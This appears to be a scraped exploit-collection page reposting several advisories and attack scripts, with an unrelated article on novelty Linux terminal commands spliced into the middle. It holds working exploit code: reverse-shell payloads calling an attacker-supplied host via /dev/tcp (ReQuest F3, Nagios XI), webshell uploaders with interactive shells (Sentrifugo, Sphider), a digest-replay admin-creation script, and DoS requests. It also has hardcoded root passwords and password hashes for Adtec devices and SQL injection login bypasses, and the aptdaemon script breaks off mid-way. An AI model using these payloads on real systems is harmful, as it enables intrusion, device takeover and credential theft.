Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5604.php

23.09.2020

--


C:\>icacls TDMSignage
TDMSignage BUILTIN\Administrators:(I)(OI)(CI)(F)
           NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
           BUILTIN\Users:(I)(OI)(CI)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)              <---------<<<
           NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)  <---------<<<

Successfully processed 1 files; Failed processing 0 files

C:\TDMSignage>dir /b *.exe
Player.exe
unins000.exe

C:\TDMSignage>icacls Player.exe && icacls unins000.exe
Player.exe BUILTIN\Administrators:(I)(F)
           NT AUTHORITY\SYSTEM:(I)(F)
           BUILTIN\Users:(I)(RX)
           NT AUTHORITY\Authenticated Users:(I)(M)              <---------<<<

Successfully processed 1 files; Failed processing 0 files
unins000.exe BUILTIN\Administrators:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             BUILTIN\Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(M)            <---------<<<

Successfully processed 1 files; Failed processing 0 files
HireHackking 
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# ReQuest Serious Play F3 Media Server 7.0.3 Unauthenticated Remote Code Execution
# 
# 
# Vendor: ReQuest Serious Play LLC
# Product web page: http://www.request.com
# Affected version: 7.0.3.4968 (Pro)
#                   7.0.2.4954
#                   6.5.2.4954
#                   6.4.2.4681
#                   6.3.2.4203
#                   2.0.1.823
# 
# Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
# into a compact powerhouse. With the ability to add unlimited NAS devices, the
# F3 can handle your entire family's media collection with ease.
# 
# Desc: The ReQuest ARQ F3 web server suffers from an unauthenticated remote
# code execution vulnerability. Abusing the hidden ReQuest Internal Utilities
# page (/tools) from the services provided, an attacker can exploit the Quick
# File Uploader (/tools/upload.html) page and upload PHP executable files that
# results in remote code execution as the web server user.
#
# =============================================================================
# lqwrm@metalgear:~/prive$ python3 ReQuest.py 192.168.1.17:3664 192.168.1.22 6161
# Let's see waddup...
# Good to go.
# Starting handler on port 6161.
# Writing callback file...
# We got the dir: /75302IV29ZS1
# Checking write status...
# All is well John Spartan. Calling your listener...
# Connection from 192.168.0.17:42057
# You got shell.
# id;uname -ro
# uid=81(apache) gid=81(apache) groups=81(apache),666(arq)
# 3.2.0-4-686-pae GNU/Linux
# exit
# *** Connection closed by remote host ***
# lqwrm@metalgear:~/prive$
# =============================================================================
# 
# Tested on: ReQuest Serious Play® OS v7.0.1
#            ReQuest Serious Play® OS v6.0.0
#            Debian GNU/Linux 5.0
#            Linux 3.2.0-4-686-pae
#            Linux 2.6.36-request+lenny.5
#            Apache/2.2.22
#            Apache/2.2.9
#            PHP/5.4.45
#            PHP/5.2.6-1
# 
# 
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
# 
# 
# Advisory ID: ZSL-2020-5602
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5602.php
# 
# 
# 01.08.2020
#

from time import sleep
import threading######
import telnetlib######
import requests#######
import socket#########
import sys############
import re#############

class Manhattan:
    
    def __init__(self):
        self.secretagent = "Mushu"
        self.payload = None
        self.deploy = None
        self.rhost = None
        self.lhost = None
        self.lport = None

    def the_args(self):
        if len(sys.argv) != 4:
            self.the_usage()
        else:
            self.rhost = sys.argv[1]
            self.lhost = sys.argv[2]
            self.lport = int(sys.argv[3])
            if not "http" in self.rhost:
                self.rhost = "http://{}".format(self.rhost)

    def the_usage(self):
        self.the_wha()
        print("Usage: python3 {} [targetIP:targetPORT] [localIP] [localPORT]".format(sys.argv[0]))
        print("Example: python3 {} 192.168.0.91:3664 192.168.0.22 6161\n".format(sys.argv[0]))
        exit(0)

    def the_wha(self):
        titl = "ReQuest Serious Play F3 Media Server RCE"
        print(titl)

    def the_check(self):
        print("Let's see waddup...")
        try:
            r = requests.get(self.rhost + "/MP3/")
            if "000000000000" in r.text:
                print("Good to go.")
            else:
                print("Something's fishy.")
                exit(-16)
        except Exception as e:
            print("Hmmm {msg}".format(msg=e))
            exit(-1)

    def the_upload(self):
        print("Writing callback file...")
        self.headers = {"Cache-Control" : "max-age=0", 
                        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarylGyylNPXG5WMGCqP",
                        "User-Agent": self.secretagent,
                        "Accept" : "*/*",
                        "Accept-Encoding": "gzip, deflate",
                        "Accept-Language": "en-US,en;q=0.9",
                        "Connection": "close"}
    
        self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/" + self.lhost+ "/" +str(self.lport) + "  <&1;rm bd0.php'\");"

        self.deploy  = "------WebKitFormBoundarylGyylNPXG5WMGCqP\r\n"########
        self.deploy += "Content-Disposition: form-data; name=\"uploa"       #
        self.deploy += "dedfile\"; filename=\"bd0.php\"\r\nContent-T"       #
        self.deploy += "ype: application/octet-stream\r\n\r\n" + self.payload
        self.deploy += "\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP\r\nConte"
        self.deploy += "nt-Disposition: form-data; name=\"location\"\r\n\r\nm"
        self.deploy += "p3\r\n------WebKitFormBoundarylGyylNPXG5WMGCqP--\r\n"
    
        requests.post(self.rhost+"/shared/upload.php", headers=self.headers, data=self.deploy)
        sleep(1)
        r = requests.get(self.rhost + "/MP3/")
        regex = re.findall(r'a\shref=\"(.*)\/\">', r.text)[2]
        print("We got the dir: /" + regex)
        print("Checking write status...")
        r = requests.get(self.rhost + "/MP3/" + regex)
        if "bd0" in r.text:
            print("All is well John Spartan. Calling your listener...")
        else:
            print("Something...isn't right.")
            exit(-16)    
        requests.get(self.rhost + "/MP3/"+ regex + "/bd0.php")       

    def the_subp(self):
        konac = threading.Thread(name="ZSL", target=self.the_ear)
        konac.start()
        sleep(1)
        self.the_upload()

    def the_ear(self):
        telnetus = telnetlib.Telnet()
        print("Starting handler on port {}.".format(self.lport))
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        while True:
            try:
                s.settimeout(7)
                s.listen(1)
                conn, addr = s.accept()
                print("Connection from {}:{}".format(addr[0], addr[1]))
                telnetus.sock = conn
            except socket.timeout as p:
                print("Hmmm ({msg})".format(msg=p))
                s.close()
                exit(0)
            break

        print("You got shell.")
        telnetus.interact()
        conn.close()

    def main(self):
        self.the_args()
        self.the_check()
        self.the_subp()

if __name__ == '__main__':
    Manhattan().main()
HireHackking 
# Exploit Title: ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service
# Exploit Author: LiquidWorm
# Software Link: http://request.com/
# Version: 3.0.0



Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 7.0.3.4968 (Pro)
                  7.0.2.4954
                  6.5.2.4954
                  6.4.2.4681
                  6.3.2.4203
                  2.0.1.823

Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.

Desc: The device can be shutdown or rebooted by an unauthenticated attacker
when issuing one HTTP GET request.

Tested on: ReQuest Serious Play® OS v7.0.1
           ReQuest Serious Play® OS v6.0.0
           Debian GNU/Linux 5.0
           Linux 3.2.0-4-686-pae
           Linux 2.6.36-request+lenny.5
           Apache/2.2.22
           Apache/2.2.9
           PHP/5.4.45
           PHP/5.2.6-1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2020-5601
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php


01.08.2020

--


$ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff
$ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot
HireHackking

There are some commands that are not used but are very fun in Linux. Do you know those? Let’s take a look at this article together!b5unqjeq0z42273.png

figlet

Using the figlet command, we can transform text into beautiful character drawings.

First we install it. Just execute the following command

apt-get install figlet example figlet bbskali.cn anwdsdiiqnn2274.png

aafire

The aafire command will appear in the terminal with a burning flame. Install apt-get install aafire effect wwajn1aiylx2277.gif

fortune

Fortune command, randomly output a sentence, or a famous English quote, or a Tang poem or Song lyrics. If there are no Tang poem or Song lyrics, you need to install apt-get install fortune fortunes-zh fmbpgx31gu52278.png

《詩經‧ 國風‧ 周南‧ 汝墳》

I followed my treasure and beat my treasures. I didn’t see a gentleman, and I was as fond as if I were swaying.

I obey your lords and attack your lords. Once I see a gentleman, I will not abandon you.

The squid is a squid, and the royal family is like a squid, although it is like a squid, and the parents are Kong Gui.

sl

Are you running the train when you meet? It comes, and it should be noted that he is exactly the opposite of ls. Install apt-get install sl effect jprphdxulkv2279.gif

wx1.png kali.png Kali Hacker Notes Follow

cowsay

The cowsay command will show a character drawing of a cow dialogue. Of course, the conversation content can be customized.

cowsay 'Welcome to follow the WeChat public account kali Hacker Notes' lttbi1qthvv2282.png

Of course, you can also use -f to select other animals

(bunny calvin cheere cock cower daemon default dragon

dragon-and-cow duck elephant elephant-in-snake eyes flaming-sheep fox

ghostbusters gnu hellokitty kangaroo kiss koala kosh luke-koala

mech-and-cow milk moofasa moose pony pony-smaller ren sheep skeleton

snowman stegosaurus stimpy suse three-eyes turkey turtle tux unipony

unipony-smaller vader vader-koala www) s2qcvqzwavm2286.png

cmatrix

Matrix shower effect in movie 《黑客帝国》 inypyrf0z1y2288.gif

asciiview

The asciiview command can convert any picture into character drawings and output xd3ngwnxdn42291.png

hollywood

Similar to many hacker movies. It has a very awesome show-off effect.

Of course, the installation is also very simple. Just use the apt command to install it. Effect xtpiobtihex2294.gif

HireHackking 
# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
# Date: 26/10/2020
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
# Vendor Homepage: http://www.sentrifugo.com/
# POC Link: https://www.exploit-db.com/exploits/47323
# Version: 3.2
# Tested on: Linux and Windows
# CVE : CVE-2019-15813
# Contact Details: https://google.com/search?q=tbhaxor

from argparse import ArgumentParser, RawTextHelpFormatter
from bs4 import BeautifulSoup, Tag
from requests.sessions import Session
import tempfile as tmp
import os.path as path
import random
import string
from huepy import *

parser = ArgumentParser(description="Exploit for CVE-2019-15813",
                        formatter_class=RawTextHelpFormatter)
parser.add_argument("--target",
                    "-t",
                    help="target uri where application is installed",
                    required=True,
                    metavar="",
                    dest="t")
parser.add_argument("--user",
                    "-u",
                    help="username to authenticate",
                    required=True,
                    metavar="",
                    dest="u")
parser.add_argument("--password",
                    "-p",
                    help="password to authenticate",
                    required=True,
                    metavar="",
                    dest="p")
args = parser.parse_args()

if args.t.endswith("/"):
    args.t = args.t[:-1]

F = "".join(random.choices(string.ascii_letters, k=13)) + ".php"

with Session() as http:
    print(run("Logging in"))
    data = {"username": args.u, "password": args.p}

    r = http.post(args.t + "/index.php/index/loginpopupsave",
                  data=data,
                  allow_redirects=False)

    if not (r.headers.get("Location", "").endswith("welcome")
            or r.headers.get("Location", "").endswith("welcome/")):
        print(bad("Unable to login. Check username / password"))
        exit(1)
    print(good("Logged in"))

    print(run("Exploiting"))
    files = {"myfile": ("shell.php", "<?php system($_POST['cmd']); ?>")}

    r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files)
    if r.status_code != 200:
        print(bad("Unable to upload file"))
        exit(1)
    file_name = r.json()["filedata"]["new_name"]
    print(info("Spawning shell"))

    user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
                     data={"cmd": "whoami"})
    host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
                     data={"cmd": "cat /etc/hostname"})
    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"

    while True:
        try:
            cmd = input(shell)
            if cmd == "exit": break
            r = http.post(args.t + "/public/uploads/policy_doc_temp/" +
                          file_name,
                          data={"cmd": cmd})
            print(r.content.decode().strip())
        except Exception as e:
            print()
            break

    print(run("Cleaning"))
    http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
              data={"cmd": "rm %s" % file_name})
    r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name)
    if r.status_code == 404:
        print(good("Cleaned"))
    else:
        print(bad("Unable to clean the file"))
HireHackking 
# Exploit Title: Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root
# Date: 2020-07-24
# Exploit Author: LiquidWorm
# Software Link: https://www.adtecdigital.com / https://www.adtecdigital.com/support/documents-downloads
# Version: Multiple

Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root


Vendor: Adtec Digital, Inc.
Product web page: https://www.adtecdigital.com
                  https://www.adtecdigital.com/support/documents-downloads
Affected version: SignEdje Digital Signage Player v2.08.28
                  mediaHUB HD-Pro High & Standard Definition MPEG2 Encoder v3.07.19
                  afiniti Multi-Carrier Platform v1905_11
                  EN-31 Dual Channel DSNG Encoder / Modulator v2.01.15
                  EN-210 Multi-CODEC 10-bit Encoder / Modulator v3.00.29
                  EN-200 1080p AVC Low Latency Encoder / Modulator v3.00.29
                  ED-71 10-bit / 1080p Integrated Receiver Decoder v2.02.24
                  edje-5110 Standard Definition MPEG2 Encoder v1.02.05
                  edje-4111 HD Digital Media Player v2.07.09
                  Soloist HD-Pro Broadcast Decoder v2.07.09
                  adManage Traffic & Media Management Application v2.5.4

Summary: Adtec Digital is a leading manufacturer of Broadcast, Cable and IPTV products and
solutions.

Desc: The devices utilizes hard-coded and default credentials within its Linux distribution
image for Web/Telnet/SSH access. A remote attacker could exploit this vulnerability by logging
in using the default credentials for accessing the web interface or gain shell access as root.

Tested on: GNU/Linux 4.1.8 (armv7l)
           GNU/Linux 3.12.38 (PowerPC)
           GNU/Linux 2.6.14 (PowerPC)
           Adtec Embedded Linux 0.9 (fido)
           Apache


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5603
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5603.php


24.07.2020

--


Creds:
------

adtec:none:500:1000:adtec:/media:/bin/sh
admin:1admin!:502:502:admin:/home/admin:/bin/sh
root1:1root!:0:0:root:/root:/bin/sh
adtecftp:adtecftp2231


SSH:
----

login as: root
root@192.168.3.12's password:

Successfully logged in.
Thank you for choosing Adtec Digital products-
we know you had a choice and we appreciate your decision!

root@targethostname:~# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
--
admin@targethostname:/$ id
uid=502(admin) gid=502(admin) groups=0(root),502(admin)
admin@targethostname:~$ id adtec
uid=500(adtec) gid=1000(users) groups=1000(users),72(apache)
admin@targethostname:~$ cat /etc/sudoers |grep -v "#"
root    ALL=(ALL) ALL
apache ALL=(ALL) NOPASSWD: ALL


Telnet (API):
-------------

Adtec Resident Telnet Server...
UserName:
adtec
adtec
PassWord:
none
User adtec connected
*.SYSD SHELLCMD cat /etc/passwd
*.SYSD CMD cat /etc/passwd
OK
root:he7TRuXjJjxfc:0:0:root:/root:/bin/sh
adtec:GC1BpYa80PaoY:500:1000:adtec:/media:/bin/sh
apache:!!:72:72:Apache Server:/dev/null:/sbin/nologin
fregd:!!:73:73:Freg Daemon:/dev/null:/sbin/nologin
ntp:!!:38:38:NTP Server:/dev/null:/sbin/nologin
syslogd:!!:74:74:Syslog Daemon:/dev/null:/sbin/nologin
admin:rDglOB38TVYRg:502:502:admin:/home/admin:/bin/sh
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
avahi:x:82:82:Avahi Daemon:/dev/null/:/sbin/nologin
avahi-autoipd:x:83:83:Avahi Autoipd:/dev/null/:/sbin/nologin
messagebus:x:81:81:Message Bus Daemon:/dev/null:/sbin/nologin
...
...
HireHackking 
# Exploit Title: GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse
# Date: 2019-08-29
# Exploit Author: LiquidWorm
# Software Link: https://www.embedthis.com
# Version: 5.1.1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse
#
#
# Vendor: Embedthis Software LLC
# Product web page: https://www.embedthis.com
# Affected version: <=5.1.1 and <=4.1.2
# Fixed version: >=5.1.2 and >=4.1.3
#
# Summary: GoAhead is the world's most popular, tiny embedded web server. It is compact,
# secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is
# ideal for the smallest of embedded devices.
#
# Desc: A security vulnerability affecting GoAhead versions 2 to 5 has been identified when
# using Digest authentication over HTTP. The HTTP Digest Authentication in the GoAhead web
# server does not completely protect against replay attacks. This allows an unauthenticated
# remote attacker to bypass authentication via capture-replay if TLS is not used to protect
# the underlying communication channel. Digest authentication uses a "nonce" value to mitigate
# replay attacks. GoAhead versions 3 to 5 validated the nonce with a fixed duration of 5 minutes
# which permitted short-period replays. This duration is too long for most implementations.
#
# Tested on: GoAhead-http
#            GoAhead-Webs
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5598
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5598.php
#
# CVE ID: CVE-2020-15688
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15688
#          https://nvd.nist.gov/vuln/detail/CVE-2020-15688
#
# CWE ID: CWE-294 Authentication Bypass by Capture-replay
# CWE URL: https://cwe.mitre.org/data/definitions/294.html
# 
# CWE ID: CWE-323: Reusing a Nonce, Key Pair in Encryption
# CWE URL: https://cwe.mitre.org/data/definitions/323.html
#
# GoAhead Security Alerts / Fix:
#  https://github.com/embedthis/goahead-gpl/issues/3
#  https://github.com/embedthis/goahead-gpl/issues/2
#  https://github.com/embedthis/goahead-gpl/commit/fe0662f945bd7e24b8d621929e1b93d8a7f3f08f#diff-0988df549d878c849d7f2c073319bcb2
#
#
# 29.08.2019
#


#
# PoC for a network controller running GoAhead web server.
# Replay Authentication Bypass / Create Admin User
#

import requests
import sys#####

if (len(sys.argv) <= 1):
    print("Usage: ./nen.py <ipaddress>")
    exit(0)

ip = sys.argv[1]

url = "http://"+ip+"/goform/formUserManagementAdd?lang=en"
kolache = {"lang":"en"}

replay  = "Digest username=\"admin\", "
replay += "realm=\"GoAhead\", "
replay += "nonce=\"5fb3ce6dec423bf8b8f0dfc8cf65244d\", "
replay += "uri=\"/goform/formUserManagementAdd?lang=en\", "
replay += "algorithm=MD5, "
replay += "response=\"1c05f4d08aa0cfcc5318882e0fb4e9af\", "
replay += "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\", "
replay += "qop=auth, "
replay += "nc=0000000a, "
replay += "cnonce=\"0649f631320f23bb\""

headers = {"Cache-Control": "max-age=0",
           "Authorization": replay,
           "Content-Type": "application/x-www-form-urlencoded",
           "User-Agent": "NoProxy/NoProblem.251",
           "Accept-Encoding": "gzip, deflate",
           "Accept-Language": "mk-MK;q=0.9,mk;q=0.8",
           "Connection": "close"}

data = {"FormSubmitCause": "button",
        "DefinitionAction": "add",
        "Define_admin_ID": "admin",
        "Define_admin_Name": "admin",
        "Define________Action________ID": '',
        "Define________Action________Name": "testingus",
        "Define________Action________Password": "testingus",
        "Define________Action________Group": "Administrators"}

requests.post(url, headers=headers, cookies=kolache, data=data)

print("Finito")
HireHackking 
# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
# Google Dork: intitle:"Sphider Admin Login"
# Date: 2014-07-28
# Exploit Author: Gurkirat Singh
# Vendor Homepage: http://www.sphider.eu/
# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
# Version: v1.3.6
# Tested on: Windows and Linux
# CVE : CVE-2014-5194
# Proof of Concept: https://www.exploit-db.com/exploits/34189

from argparse import ArgumentParser, RawTextHelpFormatter
from huepy import *
import string
import random
from bs4 import BeautifulSoup, Tag
from requests import Session
from randua import generate as randua

_F = "".join(random.choices(string.ascii_letters, k=13))

parser = ArgumentParser(description="Exploit for CVE-2014-5194",
                        formatter_class=RawTextHelpFormatter)
parser.add_argument("--target",
                    "-t",
                    help="target uri where application is installed",
                    required=True,
                    metavar="",
                    dest="t")
parser.add_argument("--user",
                    "-u",
                    help="username to authenticate",
                    required=True,
                    metavar="",
                    dest="u")
parser.add_argument("--password",
                    "-p",
                    help="password to authenticate",
                    required=True,
                    metavar="",
                    dest="p")
parser.add_argument("--debug",
                    help="if passed, spawn the firefox window",
                    default=True,
                    action="store_false")
parser.add_argument("--timeout",
                    help="timeout in seconds (default: 1)",
                    dest="T",
                    metavar="",
                    default=1)
args = parser.parse_args()

if args.t.endswith("/"):
    args.t = args.t[:-1]

print(run("Logging in"))

with Session() as http:
    data = {"user": args.u, "pass": args.p}

    headers = {"User-Agent": randua()}
    http.post(args.t + '/admin/auth.php',
              data=data,
              headers=headers,
              allow_redirects=False)
    r = http.get(args.t + '/admin/admin.php',
                 headers=headers,
                 allow_redirects=False)
    html = BeautifulSoup(r.content.decode(), "lxml")
    title: Tag = html.find("title")

    if title.text == "Sphider Admin Login":
        print(bad("Failed to login"))
        exit(1)
    else:
        print(good("Logged in"))

    payload = {
        'f': 'settings',
        'Submit': '1',
        '_version_nr': '1.3.5',
        '_language': 'en',
        '_template': 'standard',
        '_admin_email': 'admin@localhost',
        '_print_results': '1',
        '_tmp_dir': 'tmp',
        '_log_dir': 'log',
        '_log_format': 'html',
        '_min_words_per_page': '10',
        '_min_word_length': '3',
        '_word_upper_bound': '100;system($_POST[cmd])',
        '_index_numbers': '1',
        '_index_meta_keywords': '1',
        '_pdftotext_path': 'c:\\temp\\pdftotext.exe',
        '_catdoc_path': 'c:\\temp\\catdoc.exe',
        '_xls2csv_path': 'c:\\temp\\xls2csv',
        '_catppt_path': 'c:\\temp\\catppt',
        '_user_agent': 'Sphider',
        '_min_delay': '0',
        '_strip_sessids': '1',
        '_results_per_page': '10',
        '_cat_columns': '2',
        '_bound_search_result': '0',
        '_length_of_link_desc': '0',
        '_links_to_next': '9',
        '_show_meta_description': '1',
        '_show_query_scores': '1',
        '_show_categories': '1',
        '_desc_length': '250',
        '_did_you_mean_enabled': '1',
        '_suggest_enabled': '1',
        '_suggest_history': '1',
        '_suggest_rows': '10',
        '_title_weight': '20',
        '_domain_weight': '60',
        '_path_weight': '10',
        '_meta_weight': '5'
    }

    print(run("Exploiting"))
    http.post(args.t + "/admin/admin.php", data=payload)
    r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F})
    if r.content.decode().strip() != _F:
        print(bad("Failed"))
        exit(1)
    print(good("Exploited"))
    print(info("Spawning Shell"))
    user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"})
    host = http.post(args.t + "/settings/conf.php",
                     data={"cmd": "cat /etc/hostname"})
    shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"

    while True:
        try:
            cmd = input(shell)
            if cmd == "exit": break
            r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd})
            print(r.content.decode().strip())
        except:
            break
    print()
HireHackking 
# Exploit Title: Client Management System 1.0 - 'searchdata' SQL injection
# Date: 26/10/2020
# Exploit Author: Serkan Sancar
# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841
# Version: 1.0
# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3

Step 1: Open the URL http://localhost/clientms/client/index.php

Step 2: Login to client user on panel

Step 3: use check sql injection payload 1' or 1=1# in searchbox field

Malicious Request on burp suite

POST /clientms/client/search-invoices.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/clientms/client/search-invoices.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 210
Origin: http://localhost
Connection: close
Cookie: PHPSESSID=q38d8f3sveqjciu02csdfem453
Upgrade-Insecure-Requests: 1

searchdata=1%27+or+1%3D1%23&search=

Step 4: You will list all invoices and you will had checked sql injection on The Panel.

Example other method:
you saved to inspected package on burp suite. you can exploitation more easily with use sqlmap -r parameter.
sqlmap -r cms.txt --risk=1 --level=1 --dbms=mysql --dbs
HireHackking 
# Exploit Title: CSE Bookstore Authentication Bypass
# Date: 27/10/2020
# Exploit Author: Alper Basaran
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10 Enterprise 1909


CSE Bookstore is vulnerable to an authentication bypass vulnerability on the admin panel. 
By default the admin panel is located at /admin.php and the administrator interface can be accessed by unauthorized users exploiting the SQL injection vulnerability.

Payload: 
Name: admin
Pass: %' or '1'='1 

Sample BurpSuite intercept:

POST /bookstore/admin_verify.php HTTP/1.1
Host: 192.168.20.131
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: http://192.168.20.131
Connection: close
Referer: http://192.168.20.131/bookstore/admin.php
Cookie: PHPSESSID=hmqnib0ihkvo235jor7mpfoupv
Upgrade-Insecure-Requests: 1

name=admin&pass=%25%27+or+%271%27%3D%271&submit=Submit+Query
HireHackking 
# Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)
# Date: 10-27-2020
# Vulnerability Discovery: Chris Lyne
# Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 20.04
# CVE: CVE-2020-5791

#!/usr/bin/python3

import re
import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Credit: Chris Lyne for vulnerability discovery and original PoC

if len(sys.argv) != 6:
    print("[~] Usage : ./exploit.py https://NagiosXI_Host/, Username, Password, Attacker IP, Attacker Port")
    exit()

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
attacker_ip = sys.argv[4]
attacker_port = sys.argv[5]

login_url = host + "/nagiosxi/login.php"
payload = ";/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1';".format(attacker_ip, attacker_port)
encoded_payload = urllib.parse.quote_plus(payload)


def exploit():
    s = requests.Session()
    login_page = s.get(login_url)
    nsp = re.findall('var nsp_str = "(.*?)"', login_page.text)
    
    res = s.post(
        login_url,
        data={
            'nsp': nsp,
            'page': 'auth',
            'debug': '',
            'pageopt': 'login',
            'redirect': '/nagiosxi/index.php?',
            'username': username,
            'password': password,
            'loginButton': ''
        },
        verify=False,
        allow_redirects=True
    )
    
    injection_url = host + "/nagiosxi/admin/mibs.php?mode=undo-processing&type=1&file={0}".format(encoded_payload)
    res = s.get(injection_url)
    
    if res.status_code != 200:
            print("[~] Failed to connect")
    
if __name__ == '__main__':
    exploit()
HireHackking 
# Exploit Title: File Existence Disclosure in aptdaemon <= 1.1.1+bzr982-0ubuntu32.1
# Date: 2020-10-27
# Exploit Author: Vaisha Bernard (vbernard - at - eyecontrol.nl)
# Vendor Homepage: https://wiki.debian.org/aptdaemon
# Software Link: https://wiki.debian.org/aptdaemon
# Version: <= 1.1.1+bzr982-0ubuntu32.1
# Tested on: Ubuntu 20.04
#
#!/usr/bin/env python3
#
# Ubuntu 16.04 - 20.04 
# Debian 9 - 11
# aptdaemon < 1.1.1+bzr982-0ubuntu32.1
# Sensitive Information Disclosure
# 
# Reference: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html
#
# There is no input validation on the Locale property in an 
# apt transaction. An unprivileged user can supply a full path
# to a writable directory, which lets aptd read a file as root. 
# Having a symlink in place results in an error message if the 
# file exists, and no error otherwise. This way an unprivileged 
# user can check for the existence of any files on the system 
# as root.
#
# This is a similar type of bug as CVE-2015-1323.
#
# 
# $ ./test_file_exists.py /root/.bashrc
# File Exists!
# $ ./test_file_exists.py /root/.bashrca
# File does not exist!
#
#

import dbus
import os
import sys

if len(sys.argv) != 2:
	print("Checks if file exists")
	print("Usage: %s <file>")
	sys.exit(0)

FILE_TO_CHECK = sys.argv[1]

bus = dbus.SystemBus()
apt_dbus_object = bus.get_object("org.debian.apt", "/org/debian/apt")
apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.debian.apt")  

# just use any valid .deb file
trans = apt_dbus_interface.InstallFile("/var/cache/apt/archives/dbus_1.12.14-1ubuntu2.1_amd64.deb", False)

apt_trans_dbus_object = bus.get_object("org.debian.apt", trans)
apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.debian.apt.transaction")

properties_manager = dbus.Interface(apt_trans_dbus_interface, 'org.freedesktop.DBus.Properties')

os.mkdir("/tmp/a")
os.mkdir("/tmp/a/LC_MESSAGES")
